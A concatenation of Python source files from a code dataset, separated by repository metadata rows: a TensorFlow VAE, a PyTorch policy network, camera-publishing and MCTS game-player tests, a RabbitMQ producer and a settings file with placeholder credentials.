def deconv_layer(output_shape, filter_shape, activation, strides, name):
    """Create a transposed-convolution layer; return its apply function.

    output_shape: (H, W, C) of the produced map (batch dim is added in apply).
    filter_shape: (fh, fw, out_channels, in_channels), the layout
        tf.nn.conv2d_transpose expects.
    activation: 'relu', 'sigmoid' or 'linear'.
    """
    # Uniform init bounded by 1 / (fh * fw * out_channels).
    scale = 1.0 / np.prod(filter_shape[:3])
    seed = int(np.random.randint(0, 1000))  # NOTE(review): random per call (a fixed 123 was used before)
    with tf.name_scope('conv_mnist/conv'):
        W = tf.Variable(tf.random_uniform(filter_shape,
                                          minval=-scale, maxval=scale,
                                          dtype=tf.float32, seed=seed), name = name+ '_W')
        b = tf.Variable(tf.zeros([filter_shape[-2]]), name=name + '_b') # use output channel
    def apply(x):
        """Apply the layer to batch x; returns None for unknown activations."""
        # Prepend the static batch size to complete the output shape.
        output_shape_x = (x.get_shape().as_list()[0],) + output_shape
        a = tf.nn.conv2d_transpose(x, W, output_shape_x, strides, 'SAME') + b
        if activation == 'relu':
            return tf.nn.relu(a)
        if activation == 'sigmoid':
            return tf.nn.sigmoid(a)
        if activation == 'linear':
            return a
    return apply
def generator(dimH=500, dimZ=32, name='generator'):
    """Build the VAE decoder for 28x28x1 images; return its apply function.

    Architecture: MLP dimZ -> dimH -> prod((4,4,32)), reshape to (4,4,32),
    then three transposed convolutions upsampling 4x4 -> 7x7 -> 14x14 -> 28x28
    (ReLU on hidden layers, linear output).
    """
    # now construct a decoder
    input_shape = (28, 28, 1)
    filter_width = 5
    decoder_input_shape = [(4, 4, 32), (7, 7, 32), (14, 14, 16)]
    decoder_input_shape.append(input_shape)
    fc_layers = [dimZ, dimH, int(np.prod(decoder_input_shape[0]))]
    l = 0
    # first include the MLP
    mlp_layers = []
    N_layers = len(fc_layers) - 1
    for i in np.arange(0, N_layers):
        name_layer = name + '_mlp_l%d' % l
        mlp_layers.append(mlp_layer(fc_layers[i], fc_layers[i + 1], 'relu', name_layer))
        l += 1
    conv_layers = []
    N_layers = len(decoder_input_shape) - 1
    for i in np.arange(0, N_layers):
        # Last deconv produces the image and stays linear.
        if i < N_layers - 1:
            activation = 'relu'
        else:
            activation = 'linear'
        name_layer = name + '_conv_l%d' % l
        output_shape = decoder_input_shape[i + 1]
        input_shape = decoder_input_shape[i]
        # Strides chosen so each deconv upsamples from input to output size.
        up_height = int(np.ceil(output_shape[0] / float(input_shape[0])))
        up_width = int(np.ceil(output_shape[1] / float(input_shape[1])))
        strides = (1, up_height, up_width, 1)
        filter_shape = (filter_width, filter_width, output_shape[-1], input_shape[-1])
        conv_layers.append(deconv_layer(output_shape, filter_shape, activation, \
                                        strides, name_layer))
        l += 1
    print('decoder architecture', fc_layers, 'reshape', decoder_input_shape)
    def apply(z):
        """Map latent batch z through the MLP, reshape, and deconv stack."""
        x = z
        for layer in mlp_layers:
            x = layer(x)
        x = tf.reshape(x, (x.get_shape().as_list()[0],) + decoder_input_shape[0])
        for layer in conv_layers:
            x = layer(x)
        return x
    return apply
def init_weights(input_size, output_size, constant=1.0, seed=123):
    """Glorot & Bengio (2010) uniform initializer.

    Draws from U(-limit, limit) with
    limit = constant * sqrt(6 / (input_size + output_size)).
    ``output_size > 0`` yields an (input_size, output_size) matrix;
    otherwise a 1-D tensor of length ``input_size``.
    """
    limit = constant * np.sqrt(6.0 / (input_size + output_size))
    shape = (input_size, output_size) if output_size > 0 else [input_size]
    return tf.random_uniform(shape, minval=-limit, maxval=limit,
                             dtype=tf.float32, seed=seed)
def mlp_layer(d_in, d_out, activation, name):
    """Create a fully connected layer d_in -> d_out; return its apply function.

    activation: 'relu', 'sigmoid' or 'linear'.
    """
    with tf.name_scope('conv_mnist/mlp'):
        # Glorot-uniform weights, zero biases.
        W = tf.Variable(init_weights(d_in, d_out), name=name + '_W')
        b = tf.Variable(tf.zeros([d_out]), name=name + '_b')
    def apply_layer(x):
        """x @ W + b followed by the activation; None if activation unknown."""
        a = tf.matmul(x, W) + b
        if activation == 'relu':
            return tf.nn.relu(a)
        if activation == 'sigmoid':
            return tf.nn.sigmoid(a)
        if activation == 'linear':
            return a
    return apply_layer
def get_parameters():
    """Return all trainable variables created under the 'conv_mnist' scope."""
    return tf.trainable_variables('conv_mnist')
################################## Conv Encoder ##############################
def conv_layer(filter_shape, activation, strides, name):
    """Create a SAME-padded conv layer; return its apply function.

    filter_shape: (fh, fw, in_channels, out_channels).
    activation: 'relu', 'sigmoid' or 'linear'.
    """
    # Uniform init bounded by 1 / (fh * fw * in_channels).
    scale = 1.0 / np.prod(filter_shape[:3])
    seed = int(np.random.randint(0, 1000))  # NOTE(review): random per call (a fixed 123 was used before)
    W = tf.Variable(tf.random_uniform(filter_shape,
                                      minval=-scale, maxval=scale,
                                      dtype=tf.float32, seed=seed), name=name + '_W')
    b = tf.Variable(tf.zeros([filter_shape[-1]]), name=name + '_b')
    def apply(x):
        """Convolve batch x; returns None for unknown activations."""
        a = tf.nn.conv2d(x, W, strides, 'SAME') + b
        if activation == 'relu':
            return tf.nn.relu(a)
        if activation == 'sigmoid':
            return tf.nn.sigmoid(a)
        if activation == 'linear':
            return a
    return apply
def construct_filter_shapes(layer_channels, filter_width=5):
    """Return one (n_channel, filter_width, filter_width) tuple per channel count."""
    return [(n_channel, filter_width, filter_width)
            for n_channel in layer_channels]
def encoder_convnet(input_shape, dimH=500, dimZ=32, name='conv_encoder'):
    """Build the VAE encoder q(z|x); return its apply function.

    Three stride-2 conv layers (channels input -> 16 -> 32 -> 32), flatten,
    then an MLP to dimZ*2 outputs split into (mu, log_sigma).
    """
    # encoder for z (low res)
    layer_channels = [input_shape[-1], 16, 32, 32]
    filter_width = 5
    fc_layer_sizes = [dimH]
    conv_layers = []
    N_layers = len(layer_channels) - 1
    strides = (1, 2, 2, 1)
    activation = 'relu'
    l = 0
    print_shapes = []
    for i in range(N_layers):
        name_layer = name + '_conv_l%d' % l
        filter_shape = (filter_width, filter_width, layer_channels[i], layer_channels[i + 1])
        print_shapes.append(filter_shape)
        conv_layers.append(conv_layer(filter_shape, activation, strides, name_layer))
        l += 1
    # fc_layer = [int(np.prod(filter_shape)), dimH, dimZ * 2]
    # NOTE(review): the flattened conv output size is hard-coded to 512
    # (the computed alternative is commented out above); this assumes the
    # input spatial size matches the 28x28-style setup - verify for other
    # input_shape values.
    fc_layer = [512, dimH, dimZ*2]
    print(fc_layer)
    enc_mlp = []
    for i in range(len(fc_layer) - 1):
        # Final layer emits raw (mu, log_sigma) and stays linear.
        if i + 2 < len(fc_layer):
            activation = 'relu'
        else:
            activation = 'linear'
        name_layer = name + '_mlp_l%d' % l
        enc_mlp.append(mlp_layer2(fc_layer[i], fc_layer[i + 1], activation, name_layer))
        print(fc_layer[i], fc_layer[i + 1])
        l += 1
    print('encoder architecture', print_shapes, 'reshape', fc_layer)
    def apply(x):
        """Encode batch x; returns (mu, log_sigma), each of width dimZ."""
        out = x
        for layer in conv_layers:
            out = layer(out)
            print(out)
        out = tf.reshape(out, (out.get_shape().as_list()[0], -1))
        print(out)
        for layer in enc_mlp:
            out = layer(out)
        mu, log_sig = tf.split(out, 2, axis=1)
        return mu, log_sig
    return apply
def mlp_layer2(d_in, d_out, activation, name):
    """Fully connected layer used by the encoder; returns its apply function.

    NOTE(review): identical to ``mlp_layer`` except for the name scope
    ('conv_mnist/mlp2' instead of 'conv_mnist/mlp') - candidates for merging.
    """
    with tf.name_scope('conv_mnist/mlp2'):
        W = tf.Variable(init_weights(d_in, d_out), name=name + '_W')
        b = tf.Variable(tf.zeros([d_out]), name=name + '_b')
    def apply_layer(x):
        """x @ W + b followed by the activation; None if activation unknown."""
        a = tf.matmul(x, W) + b
        if activation == 'relu':
            return tf.nn.relu(a)
        if activation == 'sigmoid':
            return tf.nn.sigmoid(a)
        if activation == 'linear':
            return a
    return apply_layer
def sample_gaussian(mu, log_sig):
    """Reparameterised draw: mu + exp(log_sig) * standard-normal noise."""
    noise = tf.random_normal(mu.get_shape())
    return mu + tf.exp(log_sig) * noise
| 34.053398 | 93 | 0.573913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 671 | 0.095652 |
e2cba6d54f96928921ab9588923d5e1065f14279 | 2,237 | py | Python | basalganglia/reinforce/networks/policy_network.py | ruanguoqing/basal-ganglia | a93e4b0aa00b0335afbfada1e956d57d0877c660 | [
"Unlicense"
] | 2 | 2020-01-04T08:49:30.000Z | 2020-05-20T09:43:59.000Z | basalganglia/reinforce/networks/policy_network.py | ruanguoqing/basal-ganglia | a93e4b0aa00b0335afbfada1e956d57d0877c660 | [
"Unlicense"
] | null | null | null | basalganglia/reinforce/networks/policy_network.py | ruanguoqing/basal-ganglia | a93e4b0aa00b0335afbfada1e956d57d0877c660 | [
"Unlicense"
] | null | null | null | import torch.nn as nn, torch.nn.functional as F, torch.distributions as D, torch.nn.init as init
from basalganglia.reinforce.util.torch_util import *
class PolicyNetwork(nn.Module):
    """Two-layer tanh policy network for REINFORCE.

    Maps an observation batch to an action distribution: a Categorical over
    logits for a Discrete action space, or a MultivariateNormal with a
    state-independent, learned log-sigma for a Box action space.
    """

    def __init__(self, env, hidden_layer_width=128, init_log_sigma=0, min_log_sigma=-3):
        super(PolicyNetwork, self).__init__()
        self.state_space, self.action_space = env.env.observation_space, env.env.action_space
        # NOTE(review): min_log_sigma is stored but never applied below -
        # the log-sigma parameter is not clamped; confirm whether intended.
        self.init_log_sigma, self.min_log_sigma = init_log_sigma, min_log_sigma
        # Discrete observations are embedded; Box observations go through a
        # linear layer (only 1-D Box observations are handled: shape[0]).
        if type(self.state_space) is Discrete:
            self.input_layer = nn.Embedding(self.state_space.n, hidden_layer_width)
        elif type(self.state_space) is Box:
            self.input_layer = nn.Linear(self.state_space.shape[0], hidden_layer_width)
        else:
            raise NotImplementedError
        self.fc_layer = nn.Linear(hidden_layer_width, hidden_layer_width)
        if type(self.action_space) is Discrete:
            self.logit = nn.Linear(hidden_layer_width, self.action_space.n)
        elif type(self.action_space) is Box:
            # NOTE(review): action_min/max are stored but sampled actions are
            # never clipped to these bounds - verify against callers.
            self.action_min, self.action_max = env.env.action_space.low, env.env.action_space.high
            self.mean = nn.Linear(hidden_layer_width, self.action_space.shape[0])
            self.log_sigma = nn.Parameter(torch.ones(self.action_space.shape[0])*self.init_log_sigma)
            # Zero-initialised mean weights start the Gaussian policy near 0.
            init.zeros_(self.mean.weight)
        else:
            raise NotImplementedError

    def forward(self, s, detach=False):
        """Return the action distribution for state batch ``s``.

        With ``detach=True`` the distribution parameters are detached from
        the autograd graph.
        """
        x = self.input_layer(s)
        x = torch.tanh(x)
        x = self.fc_layer(x)
        x = torch.tanh(x)
        if type(self.action_space) is Discrete:
            p = self.logit(x)
            if detach:
                p = p.detach()
            d = D.Categorical(logits=p)
            return d
        elif type(self.action_space) is Box:
            mu = self.mean(x)
            sigma = torch.exp(self.log_sigma)  # do softplus?
            if detach:
                mu, sigma = mu.detach(), sigma.detach()
            # NOTE(review): torch.diag(sigma) is passed as the covariance
            # matrix, so the variance equals sigma (not sigma**2) - confirm.
            d = D.MultivariateNormal(mu, torch.diag(sigma))
            return d

    def policy(self, s):
        """Sample one action for a single raw state ``s``; return it as numpy."""
        state = torchify([s], type(self.state_space))
        action = self.forward(state).sample()
        return action.numpy()[0]
| 40.672727 | 101 | 0.634332 | 2,083 | 0.931158 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.006258 |
e2cc20474c2caa1bc3247bfe362cc69c7776aa35 | 4,894 | py | Python | tests/frame/test_frame_publishing.py | SimLeek/displayarray | 64fe1e2094448d86d743536eedae0039ca339063 | [
"MIT"
] | 8 | 2019-11-01T19:14:36.000Z | 2021-08-18T17:55:43.000Z | tests/frame/test_frame_publishing.py | SimLeek/displayarray | 64fe1e2094448d86d743536eedae0039ca339063 | [
"MIT"
] | 12 | 2019-10-01T06:06:48.000Z | 2020-04-29T23:05:58.000Z | tests/frame/test_frame_publishing.py | SimLeek/displayarray | 64fe1e2094448d86d743536eedae0039ca339063 | [
"MIT"
] | 3 | 2018-04-03T01:29:21.000Z | 2019-06-27T02:52:34.000Z | from displayarray.frame.frame_publishing import pub_cam_loop_opencv, pub_cam_thread
import displayarray
import mock
import pytest
import cv2
from displayarray.frame.np_to_opencv import NpCam
import numpy as np
import displayarray.frame.subscriber_dictionary as subd
import displayarray.frame.frame_publishing as fpub
def test_pub_cam_loop_exit():
    """A source that is neither an index, path, nor array raises TypeError."""
    bogus_source = mock.MagicMock()
    with pytest.raises(TypeError):
        pub_cam_loop_opencv(bogus_source)
def test_pub_cam_int():
    """Integer source: frames are published until the command sub says "quit".

    Patches OpenCV capture, the NpCam accessors and the subscriber registry
    so pub_cam_loop_opencv runs without real hardware.
    """
    img = np.zeros((30, 40))
    with mock.patch.object(
        cv2, "VideoCapture", new_callable=mock.MagicMock
    ) as mock_cv_capture, mock.patch.object(NpCam, "set"), mock.patch.object(
        NpCam, "get"
    ) as mock_get, mock.patch.object(
        NpCam, "release"
    ), mock.patch.object(
        displayarray.frame.frame_publishing.subscriber_dictionary, "register_cam"
    ) as reg_cam, mock.patch.object(
        displayarray.frame.frame_publishing.subscriber_dictionary, "cam_cmd_sub"
    ) as cam_cmd_sub:
        cap = NpCam(img)
        mock_cv_capture.return_value = cap
        mock_sub = cam_cmd_sub.return_value = mock.MagicMock()
        mock_sub.get = mock.MagicMock()
        # Three empty commands keep the loop running; "quit" terminates it.
        mock_sub.get.side_effect = ["", "", "", "quit"]
        mock_sub.release = mock.MagicMock()
        mock_get.return_value = 2
        cam_0 = subd.CV_CAMS_DICT["0"] = subd.Cam("0")
        with mock.patch.object(cam_0.frame_pub, "publish") as cam_pub:
            pub_cam_loop_opencv(0, mjpg=False)
        # One frame published per command polled (4 commands -> 4 frames).
        cam_pub.assert_has_calls([mock.call(img)] * 4)
        reg_cam.assert_called_once_with("0", cap)
        cam_cmd_sub.assert_called_once_with("0")
        # Default request_size (-1, -1) is forwarded to the capture device.
        cap.set.assert_has_calls(
            [
                mock.call(cv2.CAP_PROP_FRAME_WIDTH, -1),
                mock.call(cv2.CAP_PROP_FRAME_HEIGHT, -1),
            ]
        )
        cap.get.assert_has_calls([mock.call(cv2.CAP_PROP_FRAME_COUNT)] * 8)
        mock_sub.get.assert_has_calls(
            [mock.call(), mock.call(), mock.call(), mock.call()]
        )
        mock_sub.release.assert_called_once()
        cap.release.assert_called_once()
    # Reset the shared registry so later tests start clean.
    subd.CV_CAMS_DICT = {}
def test_pub_cam_fail():
    """When the capture device fails to open, "failed" is published on the
    camera's status channel instead of any frames."""
    img = np.zeros((30, 40))
    with mock.patch.object(
        cv2, "VideoCapture", new_callable=mock.MagicMock
    ) as mock_cv_capture, mock.patch.object(
        NpCam, "isOpened"
    ) as mock_is_open, mock.patch.object(
        subd, "register_cam"
    ) as mock_reg:
        cap = NpCam(img)
        mock_cv_capture.side_effect = [cap]
        # Simulate a camera that never opens.
        mock_is_open.return_value = False
        subd.CV_CAMS_DICT["0"] = subd.Cam("0")
        with mock.patch.object(
            subd.CV_CAMS_DICT["0"].status_pub, "publish"
        ) as mock_fail_pub:
            pub_cam_loop_opencv(0, mjpg=False)
        mock_fail_pub.assert_called_once_with("failed")
    # Reset the shared registry so later tests start clean.
    subd.CV_CAMS_DICT = {}
def test_pub_cam_high_speed():
    """With mjpg=True and an explicit request_size, the MJPEG codec and the
    requested frame dimensions are forwarded to the capture device."""
    img = np.zeros((30, 40))
    with mock.patch.object(
        cv2, "VideoCapture", new_callable=mock.MagicMock
    ) as mock_cv_capture, mock.patch.object(
        NpCam, "isOpened"
    ) as mock_is_open, mock.patch.object(
        NpCam, "set"
    ) as mock_cam_set:
        cap = NpCam(img)
        mock_cv_capture.side_effect = [cap]
        # Camera "fails" to open so the loop exits right after configuration.
        mock_is_open.return_value = False
        pub_cam_loop_opencv(0, request_size=(640, 480), mjpg=True)
        mock_cam_set.assert_has_calls(
            [
                mock.call(cv2.CAP_PROP_FOURCC, cv2.CAP_OPENCV_MJPEG),
                mock.call(cv2.CAP_PROP_FRAME_WIDTH, 640),
                mock.call(cv2.CAP_PROP_FRAME_HEIGHT, 480),
            ]
        )
def test_pub_cam_numpy():
    """A numpy-array source publishes each successfully read frame and stops
    on the first failed read."""
    with mock.patch(
        "displayarray.frame.frame_publishing.uid_for_source",
        new_callable=mock.MagicMock,
    ) as mock_uidfs, mock.patch.object(
        NpCam, "read"
    ) as mock_np_read, mock.patch.object(
        subd, "register_cam"
    ):
        img = np.zeros((30, 40))
        # Three good reads, then a read failure ends the loop.
        mock_np_read.side_effect = [
            (True, img),
            (True, img),
            (True, img),
            (False, None),
        ]
        mock_uidfs.return_value = "0"
        cam_0 = subd.CV_CAMS_DICT["0"] = subd.Cam("0")
        with mock.patch.object(cam_0.frame_pub, "publish") as cam_pub:
            pub_cam_loop_opencv(img)
        cam_pub.assert_has_calls([mock.call(img)] * 3)
    # Reset the shared registry so later tests start clean.
    subd.CV_CAMS_DICT = {}
def test_pub_cam_thread():
    """pub_cam_thread spawns a Thread running pub_cam_loop_opencv with the
    default size (-1, -1), mjpg=True and no frame limit, then starts it."""
    with mock.patch(
        "displayarray.frame.frame_publishing.threading.Thread",
        new_callable=mock.MagicMock,
    ) as mock_thread:
        thread_instance = mock_thread.return_value = mock.MagicMock()
        pub_cam_thread(5)
        mock_thread.assert_called_once_with(
            target=fpub.pub_cam_loop_opencv, args=(5, (-1, -1), True, float("inf"))
        )
        thread_instance.start.assert_called_once()
| 32.410596 | 83 | 0.625868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 335 | 0.068451 |
e2cc67d619fea277f8b31087d0bb55dfe4a8d619 | 308 | py | Python | execicios/ex019/sorteio.py | Israel97f/Exercicios-de-Python | 5d3054187977deeb3fadbd7bb1cdee035c609a61 | [
"MIT"
] | null | null | null | execicios/ex019/sorteio.py | Israel97f/Exercicios-de-Python | 5d3054187977deeb3fadbd7bb1cdee035c609a61 | [
"MIT"
] | null | null | null | execicios/ex019/sorteio.py | Israel97f/Exercicios-de-Python | 5d3054187977deeb3fadbd7bb1cdee035c609a61 | [
"MIT"
] | null | null | null | import random
# Reads the names of four students and randomly draws one of them.
a1 = str(input(' diga o nome do aluno 1 '))
a2 = str(input(' diga o nome do aluno 2 '))
a3 = str(input(' diga o nome do aluno 3 '))
a4 = str(input(' diga o nome do aluno 4 '))
lista = [a1, a2, a3, a4]
escolhido = random.choice(lista)
# BUG FIX: typo in the user-facing message ("soteado" -> "sorteado").
print('O aluno sorteado é o aluno {}'.format(escolhido))
| 25.666667 | 55 | 0.646104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.436893 |
e2cd02aade65d0b6969f2b1d510da3c44e2f7198 | 563 | py | Python | rabbitmq/python/topic_producer.py | alovn/tutorials | 84f9c5fc563e042eeff9ffa4bce4eaae0fcc6e9a | [
"MIT"
] | 7 | 2019-12-20T12:37:37.000Z | 2021-12-15T08:42:10.000Z | rabbitmq/python/topic_producer.py | alovn/tutorials | 84f9c5fc563e042eeff9ffa4bce4eaae0fcc6e9a | [
"MIT"
] | null | null | null | rabbitmq/python/topic_producer.py | alovn/tutorials | 84f9c5fc563e042eeff9ffa4bce4eaae0fcc6e9a | [
"MIT"
] | 1 | 2021-12-15T08:44:55.000Z | 2021-12-15T08:44:55.000Z | # encoding:utf-8
# Python 2 script: publish one message to the 'topic_logs' topic exchange.
import pika
import time  # NOTE(review): appears unused here - confirm before removing
# Default guest credentials; broker host and vhost are hard-coded below.
credentials = pika.PlainCredentials('guest', 'guest')
connection = pika.BlockingConnection(pika.ConnectionParameters(
    host='s1004.lab.org',
    port=5672,
    virtual_host='/',
    credentials=credentials))
channel = connection.channel()
# NOTE(review): ``type=`` is the legacy pika kwarg; newer pika versions use
# ``exchange_type=`` - confirm the pinned pika version.
channel.exchange_declare(exchange='topic_logs', type='topic')
message = 'Hello, World!'
# Hierarchical routing key; topic consumers bind with matching patterns.
channel.basic_publish(exchange='topic_logs',
                      routing_key='topic.logs.info',
                      body=message)
print " [x] Sent %r" % (message,)
connection.close() | 24.478261 | 63 | 0.680284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 125 | 0.222025 |
e2cd268e8522aa01fa610bfaf6b0ddd0d937eb64 | 295 | py | Python | settings_default.py | iticus/photomap | 46ce664412bd44d5bcd6292b04191cacbee7c446 | [
"MIT"
] | null | null | null | settings_default.py | iticus/photomap | 46ce664412bd44d5bcd6292b04191cacbee7c446 | [
"MIT"
] | 2 | 2015-11-19T21:37:01.000Z | 2015-11-25T22:37:45.000Z | settings_default.py | iticus/photomap | 46ce664412bd44d5bcd6292b04191cacbee7c446 | [
"MIT"
] | null | null | null | """
Created on Nov 1, 2015
@author: ionut
"""
import logging
DEBUG = False  # debug flag consumed by the application
LOG_LEVEL = logging.INFO  # default logging threshold
# PostgreSQL connection string for the photomap database.
# NOTE(review): placeholder credentials committed to source - override locally.
DSN = "dbname=photomap user=postgres password=pwd host=127.0.0.1 port=5432"
TEMPLATE_PATH = "templates"  # directory containing HTML templates
STATIC_PATH = "static"  # directory served as static assets
MEDIA_PATH = "/home/ionut/nginx/media"  # absolute path for media files
SECRET = "some_secret"  # placeholder secret - override in real deployments
| 15.526316 | 75 | 0.725424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 172 | 0.583051 |
e2cd8925067691083a53320bbc702cff13ae910f | 11,031 | py | Python | tests/test_mcts_player.py | donkirkby/zero-play | 15e3afa950037cfd1f373ee4943cd8b42d4c82c9 | [
"MIT"
] | 7 | 2020-04-30T15:44:56.000Z | 2021-04-07T18:37:21.000Z | tests/test_mcts_player.py | donkirkby/zero-play | 15e3afa950037cfd1f373ee4943cd8b42d4c82c9 | [
"MIT"
] | 84 | 2019-05-07T04:37:10.000Z | 2022-03-04T18:17:57.000Z | tests/test_mcts_player.py | donkirkby/zero-play | 15e3afa950037cfd1f373ee4943cd8b42d4c82c9 | [
"MIT"
] | 1 | 2021-04-07T18:37:25.000Z | 2021-04-07T18:37:25.000Z | import typing
from collections import Counter
import numpy as np
from pytest import approx
from zero_play.connect4.game import Connect4State
from zero_play.game_state import GameState
from zero_play.heuristic import Heuristic
from zero_play.mcts_player import SearchNode, MctsPlayer, SearchManager
from zero_play.playout import Playout
from zero_play.tictactoe.state import TicTacToeState
class FirstChoiceHeuristic(Heuristic):
    """Deterministic heuristic that always prefers the first legal move."""

    def get_summary(self) -> typing.Sequence[str]:
        return ('first choice',)

    def analyse(self, board: GameState) -> typing.Tuple[float, np.ndarray]:
        """Value is +1/-1 when the game is decided (from the active player's
        point of view), 0 otherwise; the policy is one-hot (see get_policy)."""
        active = board.get_active_player()
        if board.is_win(active):
            value = 1.0
        else:
            value = -1.0 if board.is_win(-active) else 0.0
        return value, self.get_policy(board)

    def get_policy(self, board: GameState):
        """One-hot policy on the first legal move (index 0 if none exist)."""
        valid_moves = board.get_valid_moves()
        # argmax yields the first nonzero index, and 0 for an all-zero mask,
        # matching nonzero()[0][0] with a fallback of 0.
        chosen = int(np.argmax(valid_moves)) if valid_moves.any() else 0
        policy = np.zeros_like(valid_moves)
        policy[chosen] = 1.0
        return policy
class EarlyChoiceHeuristic(FirstChoiceHeuristic):
    """Rates each move as 90% as good as the option before it."""

    def get_summary(self) -> typing.Sequence[str]:
        return ('early choice',)

    def get_policy(self, board: GameState):
        """Normalised geometric (0.9 ** index) weights over the valid moves."""
        mask = board.get_valid_moves()
        if not mask.any():
            # No legal moves: spread the policy over every position instead.
            mask = (mask == 0)
        scored = mask * (0.9 ** np.arange(len(mask)))
        return scored / scored.sum()
def test_repr():
    """repr() of a node surfaces the wrapped board's spaces array."""
    board = TicTacToeState("""\
.O.
.X.
...
""")
    expected_repr = "SearchNode(TicTacToeState(spaces=array([[0, -1, 0], [0, 1, 0], [0, 0, 0]])))"
    assert repr(SearchNode(board)) == expected_repr
def test_eq():
    """Nodes compare equal iff their boards match; never equal to other types."""
    blank_node = SearchNode(TicTacToeState())
    other_blank_node = SearchNode(TicTacToeState())
    played_node = SearchNode(TicTacToeState("""\
...
.X.
...
"""))
    assert blank_node == other_blank_node
    assert blank_node != played_node
    assert blank_node != 42
def test_default_board():
    """Two nodes built from the same default board compare equal."""
    board = TicTacToeState()
    assert SearchNode(board) == SearchNode(board)
def test_select_leaf_self():
    """With no visits recorded yet, the root selects itself as the leaf."""
    root = SearchNode(TicTacToeState())
    assert root.select_leaf() == root
def test_select_first_child():
start_state = TicTacToeState()
expected_leaf_board = start_state.make_move(0)
expected_leaf = SearchNode(expected_leaf_board)
node = SearchNode(start_state)
node.record_value(1)
leaf = node.select_leaf()
assert leaf == expected_leaf
assert node.average_value == -1.0
def test_select_second_child():
start_state = TicTacToeState()
expected_leaf_board = start_state.make_move(1)
expected_leaf = SearchNode(expected_leaf_board)
node = SearchNode(start_state)
node.select_leaf().record_value(0)
node.select_leaf().record_value(0)
leaf = node.select_leaf()
assert leaf == expected_leaf
assert node.average_value == 0
def test_select_grandchild():
start_state = TicTacToeState()
expected_leaf_board = TicTacToeState("""\
XO.
...
...
""")
expected_leaf = SearchNode(expected_leaf_board)
node = SearchNode(start_state)
for _ in range(10):
node.select_leaf().record_value(0)
leaf = node.select_leaf()
assert leaf == expected_leaf
def test_select_good_grandchild():
start_state = TicTacToeState()
node = SearchNode(start_state)
node.select_leaf().record_value(0) # Root node returns itself.
node.select_leaf().record_value(0) # Move 0 AT 1A, value is a tie.
node.select_leaf().record_value(-1) # Move 1 AT 1B, value is a win.
# Expect it to exploit the win at 1B, and try the first grandchild at 1A.
expected_leaf_board = TicTacToeState("""\
ABC
1 OX.
2 ...
3 ...
""")
expected_leaf = SearchNode(expected_leaf_board)
leaf = node.select_leaf()
assert leaf == expected_leaf
def test_select_no_children():
start_board = TicTacToeState("""\
XOX
OOX
.XO
""")
expected_leaf_board = TicTacToeState("""\
XOX
OOX
XXO
""")
expected_leaf = SearchNode(expected_leaf_board)
start_node = SearchNode(start_board)
leaf1 = start_node.select_leaf()
leaf1.record_value(1)
leaf2 = start_node.select_leaf()
leaf2.record_value(1)
leaf3 = start_node.select_leaf()
assert leaf1 == start_node
assert leaf2 == expected_leaf
assert leaf3 == expected_leaf
def test_choose_move():
    # With a fixed seed and 200 iterations the player finds the winning drop.
    np.random.seed(0)
    start_state = Connect4State()
    state1 = Connect4State("""\
.......
.......
.......
...XX..
OXOXO..
XOXOXOO
""")
    expected_display = """\
.......
.......
.......
..XXX..
OXOXO..
XOXOXOO
"""
    player = MctsPlayer(start_state, iteration_count=200)
    move = player.choose_move(state1)
    state2 = state1.make_move(move)
    display = state2.display()
    assert display == expected_display
def test_choose_move_in_pool():
    # Multi-process search: only check the chosen move is legal.
    start_state = Connect4State()
    state1 = Connect4State("""\
.......
.......
.......
...XX..
OXOXO..
XOXOXOO
""")
    player = MctsPlayer(start_state, iteration_count=200, process_count=2)
    valid_moves = start_state.get_valid_moves()
    move = player.choose_move(state1)
    # Can't rely on which move, because other process has separate random seed.
    assert valid_moves[move]
def test_choose_moves_at_random():
    """ Early moves are chosen from a weighted random population. """
    np.random.seed(0)
    start_state = TicTacToeState()
    state1 = TicTacToeState("""\
...
...
X..
""")
    player = MctsPlayer(start_state,
                        iteration_count=80,
                        heuristic=EarlyChoiceHeuristic())
    moves = set()
    for _ in range(10):
        move = player.choose_move(state1)
        moves.add(move)
        player.search_manager.reset()
    # More than one distinct move over ten tries shows randomness.
    assert 1 < len(moves)
def test_choose_move_no_iterations():
    # Zero iterations should pick uniformly; check move 2 lands within
    # +/-10% of the expected uniform count over 400 trials.
    np.random.seed(0)
    start_state = Connect4State()
    state1 = Connect4State("""\
.......
.......
.......
...XX..
OXOXO..
XOXOXOO
""")
    test_count = 400
    expected_count = test_count/7
    expected_low = expected_count * 0.9
    expected_high = expected_count * 1.1
    move_counts = Counter()
    for _ in range(test_count):
        player = MctsPlayer(start_state, iteration_count=0)
        move = player.choose_move(state1)
        move_counts[move] += 1
    assert expected_low < move_counts[2] < expected_high
def test_analyse_finished_game():
    # A drawn, finished board analyses to value 0 and a uniform policy.
    board = TicTacToeState("""\
OXO
XXO
XOX
""")
    heuristic = Playout()
    expected_value = 0  # A tie
    expected_policy = [1/9] * 9
    value, policy = heuristic.analyse(board)
    assert expected_value == value
    assert expected_policy == policy.tolist()
def test_search_manager_reuses_node():
    # Searching the follow-up state adds exactly 10 visits to the child
    # node kept from the first search.
    start_state = TicTacToeState()
    manager = SearchManager(start_state, Playout())
    manager.search(start_state, iterations=10)
    move = manager.get_best_move()
    state2 = start_state.make_move(move)
    node = manager.current_node
    first_value_count = node.value_count
    manager.search(state2, iterations=10)
    second_value_count = node.value_count
    assert first_value_count > 0
    assert first_value_count + 10 == second_value_count
def test_search_manager_with_opponent():
    """ Like when opponent is not sharing the SearchManager. """
    start_state = TicTacToeState()
    manager = SearchManager(start_state, Playout())
    manager.search(start_state, iterations=10)
    node = manager.current_node.children[0]  # Didn't call get_best_move().
    move = 0
    state2 = start_state.make_move(move)
    first_value_count = node.value_count
    manager.search(state2, iterations=10)
    second_value_count = node.value_count
    assert first_value_count > 0
    assert first_value_count + 10 == second_value_count
def test_annotate():
    # get_move_probabilities() reports (move, probability, count, value)
    # tuples; with the deterministic heuristic the first entry is fixed.
    start_state = TicTacToeState()
    player = MctsPlayer(start_state,
                        iteration_count=10,
                        heuristic=FirstChoiceHeuristic())
    player.choose_move(start_state)
    move_probabilities = player.get_move_probabilities(start_state)
    best_move, best_probability, best_count, best_value = move_probabilities[0]
    assert best_move == '1A'
    assert best_probability == approx(0.999013)
    assert best_count == 9
    assert best_value == approx(2/9)
def test_create_training_data():
